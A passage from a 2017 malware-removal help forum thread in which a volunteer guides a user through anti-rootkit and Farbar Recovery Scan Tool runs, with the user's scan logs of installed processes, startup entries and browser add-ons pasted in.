 * C:\Users\KEKLR\AppData\Local\Temp\{DB8B76BB-4FEE-434E-A19F-7C63CEB3B069}\{0C5C0D1B-D4FD-468F-A887-049510D06E0E}.exe (PID: 7320) [T-HEUR]

1 proccess terminated!

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * No issues found.

Checking Windows Service Integrity:

 * TBS [Missing Service]

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * HOSTS file entries found:

  127.0.0.1       localhost

Program finished at: 04/10/2017 07:22:50 PM
Execution time: 0 hours(s), 2 minute(s), and 40 seconds(s)



#19 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 10 April 2017 - 07:02 PM

I tried running RogueKiller and once again it ran about 16 minutes, and it closes. Up to this point it found 24 things.

I opened IE so I could reply and I got the message again about trying to change the home page to  "

h ttp:/go.microsoft.com/fwlink/?LinkID=61.....  

 

I took a screen shot of the option, it asked change or don't change.  I changed the link above so it couldn't be clicked on. The link above is just a portion of the entire link.


Edited by krtate, 10 April 2017 - 07:26 PM.


#20 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 10 April 2017 - 08:02 PM

I tried running the program again, my Microsoft Security Essentials appears to be stopping the run. It finds Behavior.Win32/Powessere.D

Should I be turning off Security Essentials?



#21 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 11 April 2017 - 05:40 AM

Hello krtate.

Leave Microsoft Security Essentials for now.


Please re-run Malwarebytes Anti-Rootkit BETA as follow:

  • Within the mbar folder right-click the mbar.exe file and select Run as administrator;
  • Accept the User Account Control warning prompt to start the tool;
  • Update its database and then ensure the check-boxes under "Scan targets" are all ticked and click the Scan button;
  • If infections are found click the Cleanup button to remove the threats;
  • Reboot the computer if prompted. Wait while the system shuts down and the cleanup process is performed;
  • After restarting the computer, perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click the Cleanup button once more to repeat the process;
  • If no threats were found, click the Exit button.

Please copy and paste the contents of the new mbar-log-TODAY'S-DATE.


Next,

Run FRST one more time, ensure all check-boxes are ticked under "Whitelist" but only Addition.txt under "Optional scan".
Then click the Scan button and wait until the scan is completed.
After it finished, please copy and paste the contents of the new logs (FRST.txt and Addition.txt) in your reply for my review.


Thank you.

Android 8888

 


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#22 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 05:56 AM

Will post scan early evening.



#23 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 11 April 2017 - 06:01 AM

Okay, I'll wait.

 

Thank you.

 

Android 8888


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#24 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 04:35 PM

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.04.11.04
  rootkit: v2017.04.02.01

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.18617
KEKLR :: KEKLR-PC [administrator]

4/11/2017 6:46:51 AM
mbar-log-2017-04-11 (06-46-51).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 313067
Time elapsed: 39 minute(s), 55 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)



#25 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 04:46 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-03-2017
Ran by KEKLR (administrator) on KEKLR-PC (11-04-2017 17:40:42)
Running from C:\Users\KEKLR\Desktop
Loaded Profiles: KEKLR (Available Profiles: KEKLR)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe
(LSI Corporation) C:\Program Files\LSI SoftModem\agr64svc.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\Live TV\TVAgent.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIKEE.EXE
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
() C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\FXSSVC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
( Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QLBCtrl.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\Receiver\Receiver.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\FAX Utility\FUFAXRCV.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
() C:\Program Files (x86)\Hewlett-Packard\Shared\HpqToaster.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\SelfServicePlugin\SelfServicePlugin.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\AuthManager\AuthManSvr.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil64_25_0_0_127_ActiveX.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610872 2009-07-21] ()
HKLM\...\Run: [IAAnotif] => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-06-04] (Intel Corporation)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [487424 2010-03-23] (IDT, Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [HPCam_Menu] => c:\Program Files (x86)\Hewlett-Packard\Media\Webcam\MUITransfer\MUIStartMenu.exe [218408 2009-02-25] (CyberLink Corp.)
HKLM-x32\...\Run: [QlbCtrl.exe] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [323640 2009-11-24] ( Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [UpdatePRCShortCut] => C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM-x32\...\Run: [WirelessAssistant] => C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [498744 2009-07-23] (Hewlett-Packard)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [518496 2015-06-24] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [231776 2015-06-24] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [FUFAXRCV] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe [653352 2017-02-16] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [FUFAXSTM] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe [862248 2017-02-16] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1087184 2016-01-20] (SEIKO EPSON CORPORATION)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [HPADVISOR] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe [1689144 2010-06-30] (Hewlett-Packard)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [LightScribe Control Panel] => C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe [2363392 2009-11-20] (Hewlett-Packard Company)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-01-16] (Google Inc.)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [721504 2015-09-02] (Microsoft Corporation)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATIKEE.EXE [298560 2013-09-12] (SEIKO EPSON CORPORATION)
HKU\S-1-5-18\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [919296 2015-06-03] (Kaspersky Lab ZAO)
HKU\S-1-5-18\...A8F59079A8D5}\localserver32:  <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 204.186.80.229 204.186.110.114 204.186.0.180
Tcpip\..\Interfaces\{AFE4A105-7E52-4CB0-9CAE-18A1828C5361}: [DhcpNameServer] 204.186.80.229 204.186.110.114 204.186.0.180

Internet Explorer:
==================
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-05] (Microsoft Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\URLREDIR.DLL [2017-03-05] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-05] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-07-21] (HP Inc.)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-03-05] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll [2015-04-25] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-05-02] (Google Inc.)
BHO-x32: hpBHO Class -> {ABD3B5E1-B268-407B-A150-2641DAB8D898} -> C:\Program Files (x86)\Common Files\Homepage Protection\HomepageProtection.dll [2009-06-08] (AOL Products)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\URLREDIR.DLL [2017-03-05] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-03-05] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll [2015-04-25] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-05-02] (Google Inc.)
Toolbar: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} hxxp://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: HKLM-x32 {3860DD98-0549-4D50-AA72-5D17D200EE10} hxxp://cdn.scan.onecare.live.com/resource/download/scanner/en-us/wlscctrl2.cab
DPF: HKLM-x32 {3D3B42C2-11BF-4732-A304-A01384B70D68} hxxp://picasaweb.google.com/s/v/60.08/uploader2.cab
DPF: HKLM-x32 {4B54A9DE-EF1C-4EBE-A328-7C28EA3B433A} hxxp://quickscan.bitdefender.com/qsax/qsax.cab
DPF: HKLM-x32 {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} hxxp://download.bitdefender.com/resources/scanner/sources/en/scan8/oscan8.cab
DPF: HKLM-x32 {644E432F-49D3-41A1-8DD5-E099162EEEC5} hxxp://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {9191F686-7F0A-441D-8A98-2FE3AC1BD913} hxxp://acs.pandasoftware.com/activescan/cabs/as2stubie.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler-x32: lbxfile - {56831180-F115-11d2-B6AA-00104B2B9943} - C:\Program Files (x86)\Libronix DLS\System\FileProt.dll [2002-08-05] (Libronix Corporation)
Handler-x32: lbxres - {24508F1B-9E94-40EE-9759-9AF5795ADF52} - C:\Program Files (x86)\Libronix DLS\System\ResProt.dll [2002-08-05] (Libronix Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)

FireFox:
========
FF ProfilePath: C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default [2017-04-09]
FF Homepage: Mozilla\Firefox\Profiles\rtqcgnqa.default -> hxxps://login.yahoo.com/config/login_verify2?&.src=ym&rl=1
FF Extension: (HP Detect) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\Extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2} [2012-12-08] [not signed]
FF Extension: (Site Deployment Checker) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\features\{61e6cfb8-2aca-4f3a-92fd-7275f8f7e100}\deployment-checker@mozilla.org.xpi [2017-04-03]
FF Extension: (Disable Prefetch) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\features\{61e6cfb8-2aca-4f3a-92fd-7275f8f7e100}\disable-prefetch@mozilla.org.xpi [2017-04-03]
FF Extension: (Site Deployment Checker) - C:\Program Files (x86)\Mozilla Firefox\browser\features\deployment-checker@mozilla.org.xpi [2017-04-01] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-03-14] ()
FF Plugin: @java.com/DTPlugin,version=10.6.2 -> C:\Windows\system32\npDeployJava1.dll [2012-08-29] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-03-14] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-06-24] (Citrix Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npDeployJava1.dll [2015-04-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll [2015-04-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-03-05] (Microsoft Corporation)
